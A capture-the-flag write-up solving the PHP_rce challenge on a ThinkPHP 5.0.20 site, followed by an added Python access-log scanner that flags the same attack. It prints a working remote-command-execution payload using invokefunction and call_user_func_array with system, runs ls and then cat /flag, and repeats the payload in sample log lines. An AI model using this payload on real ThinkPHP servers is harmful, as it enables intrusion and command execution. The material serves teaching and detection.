Attack and defense world web master advanced area PHP_rce
2022-07-29 00:17:00 【Ant200】
Tools
Firefox
1. Open the link and observe that the site runs on the ThinkPHP V5 framework.

2. Try requesting index.php; the page does not change. Continue by requesting a next-level file (any name will do), which reveals the version: 5.0.20.

3. Search for known vulnerabilities in that version (Baidu or GitHub) and try what you find.
The search turns up this payload: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
Submit it and look through the output for anything useful.

ls is a system command, so we only need to replace it with a command that reads the flag file.
Construct the payload: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

4. The request succeeds and returns the flag.
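From the defender's side, the requests in steps 3 and 4 leave a recognisable trace in the web server's access log. The following is an added example, not part of the original write-up: a small log scanner that flags requests whose s route parameter carries a namespaced class and invokefunction, or whose function parameter is call_user_func_array. The log format (common log format), the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format); not taken from the page.
SAMPLE_LOG = [
    r'203.0.113.7 - - [29/Jul/2022:00:10:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    r'203.0.113.7 - - [29/Jul/2022:00:10:09 +0000] "GET /?s=index/think%5Capp/invokefunction'
    r'&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 734',
    r'198.51.100.4 - - [29/Jul/2022:00:11:30 +0000] "GET /?s=index/index/hello&name=bob HTTP/1.1" 200 120',
    r'203.0.113.7 - - [29/Jul/2022:00:12:02 +0000] "GET /?s=index/think\app/invokefunction'
    r'&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag HTTP/1.1" 200 98',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_reasons(target):
    """Return the reasons a request target matches the invokefunction pattern."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # Decode once more so a double-encoded backslash (%255C) is still seen.
    route = unquote(" ".join(query.get("s", []))).lower()
    reasons = []
    if "\\" in route:
        reasons.append("s contains a backslash (namespaced class in the route)")
    if "invokefunction" in route:
        reasons.append("s routes to invokefunction")
    if any(v.lower() == "call_user_func_array" for v in query.get("function", [])):
        reasons.append("function=call_user_func_array")
    return reasons

def scan(lines):
    """Return (line_index, client_ip, reasons) for every flagged log line."""
    hits = []
    for index, line in enumerate(lines):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = suspicious_reasons(match.group(1))
        if reasons:
            hits.append((index, line.split()[0], reasons))
    return hits

if __name__ == "__main__":
    for index, ip, reasons in scan(SAMPLE_LOG):
        print(f"line {index} from {ip}: {'; '.join(reasons)}")
```

A legitimate ThinkPHP route such as s=index/index/hello contains no backslash, so normal traffic passes through unflagged.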
Related resources:
Attack and defend the world web advanced master php_rce, Attack and defend the world web master advanced area 1-5 2020.6.11 (Hazelnut is on the glowing blog, CSDN Blog)
PHP command execution exploit, ThinkPHP 5.0 & 5.1 remote command execution vulnerability analysis (AI Zhongzhi new media a Rong's blog, CSDN Blog)